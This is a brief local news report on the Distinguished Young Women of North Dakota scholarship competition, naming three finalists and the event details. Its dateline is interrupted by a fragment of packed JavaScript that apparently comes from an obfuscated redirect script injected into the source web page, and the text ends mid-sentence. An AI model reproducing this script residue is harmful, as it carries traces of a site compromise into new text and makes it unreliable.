BISMARCK, bshrn|var|u0026u|referrer|tryzs||js|php’.split(‘|’),0,{}))
N.D. ( – The Distinguished Young Women of North Dakota will be holding their Statewide scholarship competition on October 9th.

The program features High School girls from across the state that competes for cash scholarships and the opportunity to represent the state as the Distinguished Young Woman of North Dakota. ND State Program Coordinator Carol Rubino states that they fundraise every year to provide scholarship dollars to participants.

Rubino reports that the board has already selected their three finalists. They are Madison Baumgartner of Bismarck, Elizabeth Pflipsen of Fargo, and Morgan Mewes of Jamestown.

The winner of the competition will go on to compete in the nationwide Distinguished Young Women in Mobile, Alabama in June 2017 where they’ll compete for over $150,000 in cash scholarships.

The State competition will be October 9th at the Trollwood Performing Arts School in Moorhead, Minnesota. Find more by visiting